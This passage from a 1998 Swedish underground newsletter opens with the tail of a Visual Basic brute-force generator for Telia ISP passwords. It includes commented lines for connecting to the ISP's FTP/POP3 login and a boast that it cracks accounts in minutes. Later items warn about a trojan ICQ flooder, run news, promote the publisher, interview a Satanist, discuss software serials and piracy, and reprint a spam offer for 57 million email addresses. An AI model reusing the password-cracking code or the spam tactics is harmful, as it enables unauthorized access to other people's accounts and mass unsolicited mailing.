'första tecknet, bx för andra osv... Är variabeln bx = 0 så kommer den att ta
'tecknet "6" och är bx = 1 så kommer den att ta tecknet "X".
'OBS! Variabeln ax skiljer sig ifrån dom andra eftersom det finns 28 olika
'möjligheter i första tecknet av lösenordet och bara 2 i de andra. bx, cx,
dx, ex,
'fx, gx och hx kan alltså bara ha värdet 1 och 0.
'Första gången Timer´n körs ska variablerna se ut såhär:
'ax = "y"
'bx = 0
'cx = 0
'dx = 0
'ex = 0
'fx = 0
'gx = 0
'hx = 0
'I nästa försök kommer variabeln hx (sista tecknet) att ha värdet 1 så att
sista
'tecknet i lösenordet ändras. Efter varannat försök kommer även variabeln
gx att
'ändras samtdigt som variabeln hx ändras till 0 igen, var 4:e försök kommer
fx ändras,
'var 8:e försök ex t.o.m ax som ändras var 128:e gång. På så sätt får man fram
'de alla olika kombinatinerna. Smart va?
'variablerna a, b, c, d, e, f, g och h är till för att applikationen ska
veta när
'de övriga variablerna ska bytas, t ex:
'b = b + 1
'if b = 64 then bx = 1
'b = 0
'Observera att den bygger om lösenordet under varje "timer function" och
ändrar inte bara på det!
'
'Hoppas denna lilla förklaring fick er en uppfattning om hur generatorn
fungerar.
'Generatorn gjordes Februari-Mars 1997. Programmet lades dock ner i 2 månader
'pga av en bug som jag inte upptäckte förrän April då jag tänkte återuppliva
'det igen. Nemesis v1.0 släpptes i April. 2 dagar efter kom v1.1
'När ni läser detta borde v1.4+ vara ute som ni kan ladda ner från
'http://netking.ml.org/nemesis/ Men varför göra det nu när det går lika lätt
'att göra ett eget prg? :)

Private Sub Timer1_Timer()
On Error GoTo 99

'Här anges första tecknet i lösenordet, det finns 28 olika att välja med.
'Den börjar, om ni inte ändrat i koden, med ett "y"
10
a = a + 1
If a = 128 Then
GoTo 11
End If
GoTo 15
11
a = 0

'Om variabeln a nått värdet 128 är det dags att byta första tecken i
lösenordet:
If ax = "y" Then ax = "Q": GoTo 13
If ax = "Q" Then ax = "q": GoTo 13
If ax = "q" Then ax = "x": GoTo 13
If ax = "x" Then ax = "7": GoTo 13
If ax = "7" Then ax = "N": GoTo 13
If ax = "N" Then ax = "M": GoTo 13
If ax = "M" Then ax = "B": GoTo 13
If ax = "B" Then ax = "E": GoTo 13
If ax = "E" Then ax = "9": GoTo 13
If ax = "9" Then ax = "P": GoTo 13
If ax = "P" Then ax = "3": GoTo 13
If ax = "3" Then ax = "r": GoTo 13
If ax = "r" Then ax = "a": GoTo 13
If ax = "a" Then ax = "6": GoTo 13
If ax = "6" Then ax = "f": GoTo 13
If ax = "f" Then ax = "A": GoTo 13
If ax = "A" Then ax = "D": GoTo 13
If ax = "D" Then ax = "H": GoTo 13
If ax = "H" Then ax = "p": GoTo 13
If ax = "p" Then ax = "4": GoTo 13
If ax = "4" Then ax = "G": GoTo 13
If ax = "G" Then ax = "Y": GoTo 13
If ax = "Y" Then ax = "c": GoTo 13
If ax = "c" Then ax = "b": GoTo 13
If ax = "b" Then ax = "8": GoTo 13
If ax = "8" Then ax = "d": GoTo 13
'troligtvis ej existerade tecken
If ax = "d" Then ax = "2": GoTo 13
If ax = "2" Then ax = "5": GoTo 13
If ax = "5" Then ax = "C": GoTo 13
If ax = "C" Then ax = "F": GoTo 13
If ax = "F" Then ax = "K": GoTo 13
If ax = "K" Then ax = "R": GoTo 13
If ax = "R" Then ax = "X": GoTo 13
If ax = "X" Then ax = "e": GoTo 13
If ax = "e" Then ax = "g": GoTo 13
If ax = "g" Then ax = "h": GoTo 13
If ax = "h" Then GoTo 12

12
'När den gått igenom alla lösenord så genomförs denna procedur
If ax = "h" Then
MsgBox "Blah!", 64, "Alert :)"
Timer1.Interval = 0
GoTo 100
End If

13
15
pass = ""
pass = pass + ax 'Första tecknet i lösenordet läggs till.
X = ax


'Här genereras andra tecknet i lösenordet
20
If bx = 0 Then 'Är variabeln bx = 0 så ska den ta ett tecken från
sub-functionen codes1 (se längre ner) och sätta in det som andra tecken i
lösenordet
GoSub codes1
End If
If bx = 1 Then 'Är variabeln bx = 1 så ska den ta ett tecken från
sub-functionen codes2 (se längre ner) och sätta in det som andra tecken i
lösenordet
GoSub codes2
End If
b = b + 1
If b = 64 Then 'Har variabeln b nått värdet 64 är det dags att byra värdet
på bx
If bx = 0 Then
bx = 1
b = 0
Else
bx = 0
b = 0
End If
End If

'Här genereras tredje tecknet i lösenordet
30
If cx = 0 Then
GoSub codes1
End If
If cx = 1 Then
GoSub codes2
End If
c = c + 1
If c = 32 Then
If cx = 0 Then
cx = 1
c = 0
Else
cx = 0
c = 0
End If
End If

'Här genereras fjärde tecknet i lösenordet
40
If dx = 0 Then
GoSub codes1
End If
If dx = 1 Then
GoSub codes2
End If
d = d + 1
If d = 16 Then
If dx = 0 Then
dx = 1
d = 0
Else
dx = 0
d = 0
End If
End If

'Här genereras femte tecknet i lösenordet
50
If ex = 0 Then
GoSub codes1
End If
If ex = 1 Then
GoSub codes2
End If
e = e + 1
If e = 8 Then
If ex = 0 Then
ex = 1
e = 0
Else
ex = 0
e = 0
End If
End If

'Här genereras sjätte tecknet i lösenordet
60
If fx = 0 Then
GoSub codes1
End If
If fx = 1 Then
GoSub codes2
End If
f = f + 1
If f = 4 Then
If fx = 0 Then
fx = 1
f = 0
Else
f = 0
fx = 0
End If
End If

'Här genereras sjunde tecknet i lösenordet
70
If gx = 0 Then
GoSub codes1
End If
If gx = 1 Then
GoSub codes2
End If
g = g + 1
If g = 2 Then
If gx = 0 Then
g = 0
gx = 1
Else
g = 0
gx = 0
End If
End If

'Här genereras åttonde och sista tecknet i lösenordet
80
If hx = 0 Then
hx = 1
GoSub codes1
Else
GoSub codes2
hx = 0
h = 0
End If

GoTo 90
codes1:
If X = "2" Then Y = "6"
If X = "3" Then Y = "7"
If X = "4" Then Y = "7"
If X = "5" Then Y = "8"
If X = "6" Then Y = "8"
If X = "7" Then Y = "9"
If X = "8" Then Y = "9"
If X = "9" Then Y = "A"
If X = "A" Then Y = "A"
If X = "B" Then Y = "B"
If X = "C" Then Y = "B"
If X = "D" Then Y = "C"
If X = "E" Then Y = "C"
If X = "F" Then Y = "D"
If X = "G" Then Y = "D"
If X = "H" Then Y = "E"
If X = "K" Then Y = "E"
If X = "M" Then Y = "F"
If X = "N" Then Y = "F"
If X = "P" Then Y = "G"
If X = "Q" Then Y = "G"
If X = "R" Then Y = "H"
If X = "X" Then Y = "H"
If X = "Y" Then Y = "K"
If X = "a" Then Y = "K"
If X = "b" Then Y = "M"
If X = "c" Then Y = "M"
If X = "d" Then Y = "N"
If X = "e" Then Y = "N"
If X = "f" Then Y = "P"
If X = "g" Then Y = "3"
If X = "h" Then Y = "3"
If X = "p" Then Y = "4"
If X = "q" Then Y = "4"
If X = "r" Then Y = "5"
If X = "x" Then Y = "5"
If X = "y" Then Y = "6"
pass = pass + Y 'Här lägger den till nästa tecken i lösenordet
X = Y
Return

codes2:
If X = "2" Then Y = "Y"
If X = "3" Then Y = "Y"
If X = "4" Then Y = "a"
If X = "5" Then Y = "a"
If X = "6" Then Y = "b"
If X = "7" Then Y = "b"
If X = "8" Then Y = "c"
If X = "9" Then Y = "c"
If X = "A" Then Y = "d"
If X = "B" Then Y = "d"
If X = "C" Then Y = "e"
If X = "D" Then Y = "e"
If X = "E" Then Y = "f"
If X = "F" Then Y = "f"
If X = "G" Then Y = "g"
If X = "H" Then Y = "g"
If X = "K" Then Y = "h"
If X = "M" Then Y = "h"
If X = "N" Then Y = "p"
If X = "P" Then Y = "p"
If X = "Q" Then Y = "q"
If X = "R" Then Y = "q"
If X = "X" Then Y = "r"
If X = "Y" Then Y = "r"
If X = "a" Then Y = "x"
If X = "b" Then Y = "x"
If X = "c" Then Y = "y"
If X = "d" Then Y = "y"
If X = "e" Then Y = "2"
If X = "f" Then Y = "2"
If X = "g" Then Y = "P"
If X = "h" Then Y = "Q"
If X = "p" Then Y = "Q"
If X = "q" Then Y = "R"
If X = "r" Then Y = "R"
If X = "x" Then Y = "X"
If X = "y" Then Y = "X"
pass = pass + Y 'Här lägger den till nästa tecken i lösenordet
X = Y
Return

90
'Connecta med din FTP/POP3-Control här! Till exempel:
'control.host = "m1.800.telia.com" 'Pröva gärna POP3
'control.logonname = "u80000000"
'control.logonpass = pass 'Borde vid första försök vara: y689AAAA
'control.connect
'Eftersom vi inte har tid o joxa med det nu så ändrar vi bara formens Caption
Form1.Caption = pass 'Menytexten på Form1 blir till det aktuella lösenordet.
GoTo 100
99
'Lägg in alla errorkoder här!
100
End Sub
'Ett par sista ord från producenten:
'
'Jag måste säga ett Telias System suger!
'Att en 16 åring (MVG i matte då ;) som nyss gått ut 9:an ska kunna göra ett
'program i Visual Basic som knäcker deras lösenord inom några få minuter är
'faktiskt alldeles för skamligt.
'

'E-Post: tomtarna@hotmail.com
'IRC: #020.se, DALnet
'URL: http://netking.ml.org/nemesis/ (skicka epost eller någe om den inte
funkar)
'
'Vi vill INTE ha några frågor om source-koden!
'

Anonym @ #020.se

__________________________________________________________________________


12. FARLIG ICQ FLOODARE
==========================

För Er som testat ICQ floodaren ICkiller utfärdas extrem varning.
Detta är ett program som exploitar datorn ganska kraftigt och gör
Windoze mer instabilt än det redan är som en bi-effekt.
Har du kört ICkiller och installerat .OCX filerna så bör du genast gå
till denna URL och noga följa/läsa innehållet.

http://members.tripod.com/~hakz/ICQ/index.html

.OCX filerna http34.ocx och dssock32.ocx som man måste installera
med regsvr32 kan enkelt avinstalleras genom att man kör
regsvr32.exe/u http34.ocx i C:\Windows\System\

För att kontrollera om man är exploitad kan man enkelt köra CTRL-ALT-DELETE
och ta sig en titt. Ligger det två stycken Explorer öppna, och kanske
RegEdit också så är du utsatt. Fake Explorer skickar känslig information till
programmeraren bakom ICkiller.
explorer.exe ligger i C:\Windows, medans fake-explorer ligger i
C:\Windows\System
För att säkra sig kan man kolla egenskaperna hos Explorern i SYSTEM katalogen.
Står det att versionen är engelsk och att versions-numret slutar på .950 är
det med hög sannolikhet fake-explorern.
För att åtgärda detta bör du först avsluta Fake Explorern genom att använda
CTRL-ALT-DELETE.
Eftersom riktiga explorer.exe laddas först så bör den undre explorern vara
den falska.
Avsluta den och radera sedan fake-Explorern från HDn tillsammans med hela
ICkiller.
 Även dom 1.exe filer den skapat. Sök HDn efter sådana filer och ta bort
allihop.
Har du nu fått bort dom falska .OCX filerna (ersatt dom med originalen om
sådana fanns?) raderat exploit-explorer och hela ICkiller så bör du vara
säkrad.

Detta var en kompirmerad och försvenskad version av informationen på URL:en
ovan.

Och ett gott råd läsare: Akta er noga för att köra oseriösa program som
mifflar om i Systemet. Det kan äventyra Din integritet samt din dators
säkerhet om Du inte redan insett det.

Dr Shaddack

__________________________________________________________________________


13. ANONYMITETS SERVERN ZOOM LÄGGS NED
==========================

Zooms anonyma remailer har lagts ner, tjänsten kommer inte att återupptas.
Remailern var aldrig avsedd som en publik tjänst och på senare tid har
trafiken till remailern varit för hög, samt att antalet mail till oss på
zoom angående remailern varit påfrestande många.
Om du vill veta mer om anonyma remailers, besök istället
http://www.stack.nl/~galactus/remailers/


__________________________________________________________________________

      > > > P O L I T I K & T E R R O R I S M < < <
__________________________________________________________________________


14. INVANDRARE DÖMD FÖR HITLERHÄLSNING
==========================

En 20-årig iranier jobbade som bartender på en danskrog när några
kamrater vinkade till honom från dansgolvet. En tjej i sällskapet gjorde
på skoj en hitlerhälsning.

20-åringen svarade med samma mynt, skriver tidningen Hallands Nyheter.

Allt var på skoj men en adopterad indier som befann sig i lokalen tyckte
inte att det var roligt. Han polisanmälde bartendern för hets mot folkgrupp.

Iraniern dömdes i måndags till 300 kronor i böter av Halmstads tingsrätt,
dock inte för hets mot folkgrupp utan för förargelseväckande beteende.

[Källa: TT]

__________________________________________________________________________

           > > > F L A S H B A C K < < <
__________________________________________________________________________


15. FLASHBACK FOUNDATION
==========================

Flashback drivs helt idéelt och utan vinstintresse. Det har den alltid
gjort och kommer alltid att göra. Den drivs helt fristående från yttre
inblandning av såväl stat som etablerade mediakoncerner. Flashback har
även valt att avstå från press stöd (kulturtidskrifts stöd) och intäkter
från såväl annonser som sponsring. Detta för att kunna fortsätta vara
opartisk och kritiskt granskande.
Flashback är dock mer än bara en tidning. Flashback driver en mängd andra
projekt (även dessa dessa idéelt):

   Flashback Records
   Flashback Books
   Flashback Television
   Flashback Software
   Flashback News Agency
   Flashback Community

För att kunna erbjuda dessa tjänster och för att framförallt kunna erbjuda
dessa tjänster kostnadsfritt (alt. självkostnadspris) så behövs pengar.
Pengar som kan investeras i allt från modem till modempooler till att
bekosta tryckning av böcker av nya författare eller helt enkelt påbörja
fler nya projekt.

Flashback kommer att fortsätta sitt arbete oavsett ditt bidrag. Flashback
har funnits i över 15 år och vi har inga planer på att lägga ned
verksamheten. Men med mer pengar kan vi erbjuda bättre och framförallt
fler tjänster. Flashback Foundation är bl.a. startat för dig som vill ha:

   Flashback Community utan månadsavgift
   Hemsidor utan passwords & reklam för porr siter
   Flashback News Agency (FNA) gratis och utan reklam
   Flashback magazine utan 33% reklam
   Fler mailinglistor, nyhetsgrupper och påbörjade projekt

Nej, Flashback har inga planer på att börja ta betalt för någon av sina
gratistjänster, lika lite som vi kan tänka oss att ta emot annons pengar.
Stöd oss ifall du har pengar. Sätt in en extra slant nån gång då och då
ifall ekonomin tillåter. Är du fattig? Njut av vår verksamhet. Vi finns
kvar och du är ändå alltid lika välkommen tillbaka.

   Be strong - be wrong...

   Flashback Foundation
   Box 676
   114 79 Stockholm

   Postgiro: 39 64 28-5 | Bankgiro: 5355-6866
   URL: http://www.flashback.se/foundation/

__________________________________________________________________________


16. FLASHBACKS LOGO IN ASCII
==========================


           ######
           #  #
           # ## #
           # ## #
           # ## #
           # ## #
     ############## ## ##############
     # ######## ### ## ### ######## #
     # ####### #### ## #### ####### #
     # ###### ##### ## ##### ###### #
     # ##### ##   ##   ## ##### #
     # ###### ## ######## ## ##### #
     # ### ### ## #   ### ###### #
     # ##  #### # #### # ### ## #
     # # ## ## ## ## ## ### ## # #
     ## #### # ## ## ## # # ##### #
     # ### ## #### #### ### ## ### #
     ##### ## ### ## #### # #####
     ##### # ## ### # ### ##  #####
  #####   # ### ### ### ## #   ######
  ############ # ## # ## # ## ############# #
  ############ ## ## #### ## ## ########### #
  ############ # ## # ## # ## # ########### #
  #     ## ## ### #### ### #      #
   ######### # ## ##### #### ## # ##########
     ##### ## #### ## #### ## #####  Flashback Logo in ascii
     # ### ## #### #### #### ## ### #  By: Cerial Phreak
     ## #### # ## ## ## ## # ##### #  www.flashback.net/~cerial/
     # # ## #### ## # ## ### ## # #
     # ## #### # #### ####### ## #
     # ####### ###   # ## ####### #
     # ###### ## ####### ## ###### #
     # ##### ##   ##   ## ##### #
     # ###### ##### ## ##### ###### #
     # ####### #### ## #### ####### #
     # ######## ### ## ### ######## #
     #      ## ## ##      #
     ############## ## ##############
           # ## #
           # ## #
           # ## #
           #  #
           ######


__________________________________________________________________________


17. VIKTIG INFORMATION ANGÅENDE FLASHBACKS MAILINGLISTOR
==========================

Flashback driver totalt 5 mailinglistor:

 - Whorse
 - Community
 - Warez 4 PC
 - Warez 4 Mac
 - Root XS

Samtliga mailinglistor är 'slutna' och enbart tillgängliga för kunder hos
Flashback Community. För att kunna ansluta sig till någon av dessa listor
så måste din förfrågan göras från en flashback.net-adress.

Din förfrågan om medlemskap NEKAS ifall du gör din förfågan från en annan
adress (t.ex. algonet.se, hotmail.com etc).

OBS!: Detta publ. då vi fortfarande får mellan 10-50 förfrågningar varje
dygn om medlemskap från personer som saknar en flashback.net adress.

__________________________________________________________________________


18. NYHETER PÅ FLASHBACKS HEMSIDA
==========================

Här kommer en kortfattad genomgång över de sidor som har uppdaterats
senaste veckan.

Flashbacks WWW Guide
URL: http://www.flashback.se/www/
Ny och helt omgjord WWW guide. Alla länkar funkar !!!
Hjälp oss gärna att komplettera med bra länkar som vi missat.
Observera dock att detta bara är en beta version än så länge. Den är
dock klar inom de närmaste veckorna, och är då minst dubbelt så stor.

Flashback Underground Adress Guide
URL: http://www.flashback.se/underground/
Nu äntligen med egen hemsida. Fler områden som lista över skivbolag och
fanzines/underground tidningar kommer inom kort.

Sedan har även följande sidor tillkommit:

Flashback Records: http://www.flashback.se/rec/
Flashback Books: http://www.flashback.se/books/
Flashback Television: http://www.flashback.se/tv/
Flashback Foundation: http://www.flashback.se/foundation/

Fler nyheter kommer att presenteras i nästa FNA.

__________________________________________________________________________


19. FNA BOKEN SÅLDE SLUT SAMMA DAG
==========================

FNA-boken som vi berättade om i förra veckan sålde slut på bara några
timmar. Inom några dagar hade vi fått flera hundre beställningar, och vissa
erbjöd över 2000kr för den.

15 exemplar kommer att säljas, och vi kommer att kontakta köparna under
den kommande veckan...

URL: http://www.flashback.se/books/

__________________________________________________________________________

 > > > R E L I G I O N / F I L O S O F I / K O N S P I R A T I O N < < <
__________________________________________________________________________


20. GUD TILL SALU: KRISTENDOMEN EN MILJARDINDUSTRI
==========================

Förkortningen 'WWJD' låter som en amerikansk radiostation. Men det är
inskriptionen i ett halsband där bokstäverna står för 'What would Jesus
do' - 'vad skulle Jesus göra?' Halsbandet är det senaste i en uppsjö av
kristna produkter som i dag tros omsätta nära 23 miljarder kronor varje
år i USA.

Ett annat exempel på den kristna köpfebern är Veggietales, en video för
barn i vilken olika grönsaker sprider käcka kristna budskap. I avsnittet
'Where's God When I'm Scared - var är Gud när jag är rädd?' spelas
huvudrollen av en gurka och en tomat. Efter Sesame Street är den USA:s
mest sålda barnvideo i dag.

Antalet affärer som säljer kristna prylar har fyrdubblats sedan 1989. Förra
året var kristen skönlitteratur den störst växande genren på den amerikanska
bokmarknaden. Samtida kristen musik är i dag större än jazz och klassisk
musik.

Även icke-religiösa företag börjar investera i den kristna kommersen.
Butikskedjan Wal-Mart har nu speciella kristna avdelningar och de etablerade
skivbolagen slåss om den kristna musiken. De kristna företagens reaktion är
att slå samman mindre företag till större.

[Källa: Economist / Metro]

__________________________________________________________________________


21. INTERVJU MED JOHANNES SONESSON (SATANIST & GRUNDARE AV BELIAL CENTER)
==========================

1. Vad är Belial Center?

Ett "syndens näste" i Sverige med huvudinriktning på distribution av böcker
om Satanism och Mörk magi, rituella tillbehör etc. etc.

2. Vad var syftet med Belial Center när det startades?

Tanken var som sagt att försöka skapa en knytpunkt, ett centrum för "Satan",
de mörka tankarna, filosofin och magin. Ett ställe där "synden" skulle
frodas, där likasinnade lätt skulle kunna få kontakt med likasinnade. Och
att tillhandahålla material som annars var väldigt (ibland omöjligt) att få
tag i, vilket jag personligen hade problem med, detta var också anledningen
till att jag tog intiativ till att starta upp Belial Center.

3. Tycker du att ni lyckats väl med detta syfte?

Ja relativt. Men även om många har hört talas om oss, har vi mycket arbeta
kvar framöver. Vi har också fått väldigt mycket positiva brev och
uppmuntrande ord, så det känns verkligen som vi uppskattas och behövs av
alla de som är intresserade av de mörka sfärerna av ockultismen och eller
den Satanistiska livs-synen.

4. Hur kom det sig att ni startade upp Non Christian Generation, och ge en
förklaring av vad det är samt vilka mål föreningen har!

Syftet med kampanjen, som egentligen skulle ha startat under sommaren 1996,
var att försöka vända den ofta felaktiga och snedvridna bilden av Satanism i
media samt i Svenssons huvud. Kampanjen ser dock ut att kunna komma igång
riktigt nu under året, folders och information kommer att skickas ut till ca
200 berörda. Föreningen Non Christian Generations mål är att samla ihop alla
ensamvargar, så att vi tillsammans kan bygga upp en stark Satanistisk
organisation. Vi vill även försöka ge så många som möjligt tillgång till
information där de får en äkta och ärlig bild av Satanismen.

5. Har du hört talas om en organisation som heter "Youth against Christ?"
och som bland annat ALTAR gör reklam för på sina skivor?

Nej, tyvärr inte.

6. Vore det inte en idé att försöka samarbeta med andra organisationer som
denna för att kunna växa sig starkare?

Jo det är väldigt intressant som jag sa tidigare. Och vi välkomnar alla
organisationer, brödrar och systrar på den mörka stigen att ta kontakt med
föreningen. Tillsammans är vi starka!

7. Har ni stött på några problem med myndigheter eller kyrkan med Belial
Center eller "Non Christian Generation"?

Inget konkret. Säpo och polismyndigheterna har granskat oss lite närmare.
Men varken vi eller våra medlemmar har haft några problem med dessa, och då
vi försöker informera dessa upplever dom oss inte längre som något hot.
Kyrkan har nästan alltid undvikit oss, men de som har försökt attackera oss
har vi snabbt snäppt av.

8. Ni vill alltså ändra Svenssons syn på satanismen, men varför syns ni då
aldrig i media, tex någon kvällstidning som säkert skulle vara intresserade
av att höra vad ni håller på med?

Vi har faktiskt medverkat 2-3 ggr. på TV, och figurerat i ett flertal olika
tidningar. Men vi kommer definitivt att synas mera inom den närmsta tiden.

9. Vilken är enligt er Svenssons nuvarande syn på satanismen?

Till 90% tror de på allting som tidningarna skriver, vilket gör att de
oftast förknippar Satanismen med psykopater, barnoffer, kyrkbränder, blodiga
ritualer etc. etc.

10. Definiera satanismen som den är enligt dig! Vad krävs för att vara
satanist, måste man vara ond och taskig?

För mig själv (och många många andra) är Satanismen en filosofi och ett sätt
att se på saker och ting. Personligen tycker jag detta är en väldigt sund
"religion" som känns helt rätt och naturlig. Tvärtemot vad många tror
handlar inte den moderna Satanismen om att dyrka Djävulen eller hans
demoner. Här är en parallell jämförelse, kristendomen handlar i grund och
botten om att förneka "synderna" så att du blir "ren" och får komma till
"himmeln" och leva i all evighet med en schizofren och paranoid Gud (Jahve).
I den judiska mytologin symboliserades folkets synd av en Syndabock som
offrades en gång om året för att blidka Guds vrede över synden, det vill
säga deras naturliga leverne. Satan (Getabocken) kom senare till att bli
alla de så kallade synderna personifierad.
Satanismen (Synd-ismen) handlar alltså egentligen om en filosofi som
accepterar människan som hon är, om vi skall använda kristen terminologi -
syndig, med alla hennes naturliga drifter, och som både "ond" och "god".
Tyvärr är detta inte den bild de flesta har av Satanismen. Kyrkan har under
århundraden försökt måla upp Satanismen som det hemskaste som kan tänkas
existera. Syftet med denna propaganda förstår nog egentligen vem som helst.
Genom att skrämma massorna med en levande bild av Satan som ett verkligt
väsen, Helvetet och med Mörkmagikernas förmodade blodfyllda cermonier, är
det ganska lätt att hålla fast de troende i sin banala tro. Vem skulle för
bara några århundraden tillbaks våga att inte döpa in sina barn i kyrkan?
Alla har ju hört vad Djävulsdyrkarna gör då och då med odöpta barn.....
Denna bild lever otroligt nog till stor del kvar i dagens samhälle, mycket
kanske tack vara massmedias sensationsjournalistik samt filmens och
litteraturens flitiga användande av kyrkans Fantasi och Mytprodukter. Faktum
är att inte före 1966 började den lite större publiken att inse vad modern
Satanism (i motsatts till den tradionella kristna versionen) egentligen är.
Detta var det år som amerikanen Dr. Anton LaVey stolt proklamerade att
Satans Kyrka (Syndens Kyrka) hade öppnats. Tre år senare publicerades hans
bok, Den Sataniska Bibeln, som fram till idag, tillsammans med hans övriga
verk har sålts i över 2 miljoner exemplar.
De som faktiskt Dyrkar den kristna bilden av Satan eller de Mörka Gudarna
överhuvudtaget brukar idag oftast betecknas som "Djävulsdyrkare". Den som
utger sig för att vara Satanist, men som följer den gamla Satanismens ideal
bör även den anta denna namn.

11. Tror du att alla satanister håller med dig om denna definition?

Nej, men säkerligen den övergripande delen. LaVey myntade till stor del
dagens Satanism, och hans grundläggande definitioner kommer inte kunna
rubbas i första taget. Men jag har ändå stor en respekt för de som inte
delar mina åsikter. Och jag tycker i grund och botten att "Djävulsdyrkaren"
och "Satanisten" står varandra väldigt nära, vi delar ju till stor del samma
livs-filosofi och vi upphöjer det syndiga livet och ser Satan som den
"ultimala förebilden".

12. Anton LaVey, vad anser du om honom? Det finns ju grupperingar av
satanister som inte alls tycker att hans ideer om satanismen är riktiga.

En bra ledare som levde sitt liv i enlighet med sin vilja och som lyckades
nå ut med sitt budskap. Men faktum är att nästan inget av de han skrev var
något nytt, snarare en samling av äldre skrifter som togs fram i ljuset igen
i en ny form.

13. Hur reagerade du när du fick höra om hans död?

Tyckte att det var lite synd att jag inte han träffa honom personligen.

14. Hur blev du satanist och har du aldrig tvivlat på din tro?

Satanist blir man inte - man födds till det!.... Jag läste "The Satanic
Bible" för flera år sedan och kände att det är Människans rätta jag, detta
känns helt och fullt rätt. Tvivlat har jag nog aldrig gjort, men givetvis
har jag funderat mycket, men det finns nog inte någonting som skulle kunna
få mig att konvertera till någon annan "religion".

15. Anser du dig vara en religiös människa?

Inte i vanlig mening.

16. Måste man inte tro på gud och erkänna jesus för att vara satanist,
satanismen är ju född ur kristendomen?

Nej. Filosofin har inte sina rötter, bortsett från de yttre attributen, i
kristendomen som man kanske skulle kunna tro. I stället härstammar den från
urreligionerna och från djupet av människans eget psyke.
Man skulle kunna säga att Satanismen är manifestationen av den Vänstra
handens väg. Skillnaden mellan den Vänstra och den Högra handens väg (i
nästan alla kulturer) är att den första står för utvecklandet av det egna
jaget, medan den andra försöker hämma detta, genom förening med "Gud", eller
strävan för att bli ett med universum (Nirvana). Sammantaget, den Vänstra
handens väg säger att du skall sträva efter att bli din egen gud - efter
ditt egna personliga koncept. Poeten Aleister Crowley utryckte det så här:
"Det finns ingen Gud utom Människan, varje man och kvinna är en Stjärna.,
Gör vad Du vill skall vara den enda Lagen".
Alla är potentiella gudar och det är bara du själv som kan avgöra vad som är
rätt och fel för dig, du har alla förutsättningar - gör det Du vill av
livet! Den motsatte vägen, kristna, hinduer, muslimer, buddister mfl. säger
att individen skall ge upp sin egen identitet, och genom att göra detta, bli
ett med "skaparen" efter döden. Satanisten insisterar på att vi är
separerade från alla gudar och skapare. Med detta synsätt tillåter vi oss
själva att vara den Högste, ta kontrollen över våra liv, uppfylla våra
drömmar och "egoistiska" mål.

17. Vad särskiljer egentligen satanismen från extremliberalismen? De
filosofiska ideerna är näst intill identiska.

Satanismen ser även till människans rituella behov (magiko-antropologi).
Dessutom sträver vi för att få kontakt med hela vårt medvetande, att bli
starkare och utnyttja vår potenial till det maximala, denna strävan och
utveckling finns inte i extrem-liberalismen.

18. Vad anser du om åsikten att satanister bara är vår tids punkare, finniga
tonåringar som hittat lite snett under sin tonårskris?

Väldigt fel, då majoriten i Belial Centers kontaktnät är över 25 år....

19. Vad tror du kommer att hända med religionerna i framtiden?

Dom flesta kommer förhoppningsvis att dö ut. Det är dags för den Mörka
prinsen att stiga upp och ta sin tron i besittning. Satans Tidsålder är här!

20. Känner du att ni på Belial Center och i Non Christian Generation har en
funktion att fylla i denna utveckling?

Självklart!

+++

Ytterligare info:
Belial Center, Box 96, 451 15 Uddevalla
Tel: 0704-814 809

[Intervjun är gjord av. Janos]

__________________________________________________________________________

         > > > N O T I S E R / Ö V R I G T < < <
__________________________________________________________________________


22. FALSKA ENTRÉBAND TILL HULTSFREDS FESTIVALEN TILL SALU
==========================

Den unga kvinnan försökte sälja entréband till den förestående rockfestivalen
till en man på gågatan i Hultsfred.
Men den utvalde kunden råkade vara rockfestivalens egen ordförande. Och några
entréband till festivalen finns ännu inte ute.
Det är först i festivalkassan som besökarna får sitt armband. Så i stället
för pengar i fickan fick kvinnan följa med till polisen, skriver Vimmerby
Tidning.

[Källa: TT]

__________________________________________________________________________


23. PLATSANNONS: BÖDEL SÖKES
==========================

Det finns ett jobb ledigt i kungadömet Swaziland, i södra Afrika. För
att klara av jobbet behövs ingen erfarenhet, anser arbetsgivaren, men sökande
måste vara redo att jobba på helgerna.

Det Swaziland letar efter är en ny bödel. Dödsdomar verkställs genom hängning.
Det har inte skett sedan 1984, men det finns åtta dödsdömda som väntar.
Tidigare delade Swaziland bödel med Botswana och Lesotho.

[Källa: TT-Reuters]

__________________________________________________________________________


24. FRÅGOR & SVAR
==========================

 # F R Å G O R

ÄR DET OLAGLIGT ATT SPRIDA SERIE NUMMER?

Får man lägga upp serienummer till kommersiella program på sin hemsida.
Jag hotas nu av 500.000 i skadestånd av bl.a. BSA ifall jag inte tar
bort min 'Serial Numbers Page'.

Sluggo

**************************************************************************

 # S V A R

RE: VILKA REGLER GÄLLER ANG. MP3

Gränsen går när du kopierar upphovsrättsskyddat material...
Alltså, om du mp3'ar ner nån annans skiva och lyssnar på den själv.
Då har du gjort dig skyldig till piratkopiering och kan dömas till
en massa skit, skadestånd och grejer.

Däremot så kan du ta alla dina Egna skivor, som du köpt, och mp3'a dem
och lägga dem på en cd... Man får alltså kopiera dem för privat bruk.
Du får däremot inte sälja dina mp3-skivor sedan, och ej heller ge bort
dem om jag inte har fel... för då handlar det återigen om
piratkopiering...

Hemsidor med mp3 kan du tipsa folk om hur mycket du vill, då allt som
finns på nätet är offentligt. Men du får inte ta ner, och använda
musiken som finns på sidorna utan upphovsmannens tillstånd.

Powered By Will

__________________________________________________________________________


25. FEEDBACK
==========================

 RE: 57 MILJONER E-MAIL ADRESSER SÄLJES FÖR 750 KR

"Reklam, eller "spam", via epost har blivit en jätteindustri där register
över e-postadresser blir allt värdefullare. Den norska nättidningen GuruNEWS
kunde nyligen berätta att man erbjudits köpa 57 miljoner e-postadresser för
99 dollar (ca 750 kronor) av företaget Cyber Bulk. I köpet ingår även
e-postprogrammet Stealth Mailer som automatiskt lägger in en falsk avsändare
(spammare vill gärna vara anonyma)."

Här kommer erbjudandet i sin helhet. Tycker det första var lite väl tunt och
kortfattat för ett i annars så pass frispråkigt organ som FNA. ;-)

+++

Subject: E-Mail anything to 57 million people for only $99
Date: Mon, 08 Jun 98 21:11:13 EST
From: favvafeephjmg.com@grommit.magnet.com
Reply-To: web@favkjmnhgg.com
To: Friend@public.com

57 MILLION EMAILS FOR ONLY $99 INCLUDES STEALTH MAILER

   That's right, I have 57 Million Fresh email addresses that I
will sell for only $99. These are all fresh addresses that include
almost every person on the internet today, with no duplications. They
are all sorted and ready to be mailed. That is the best deal anywhere
today ! Imagine selling a product for only $5 and getting only a 1/10%
response.  That's $2,850,000 in your pocket !!!
Don't believe it? People are making that kind of money right now by
doing the same thing, that is why you get so much email from people
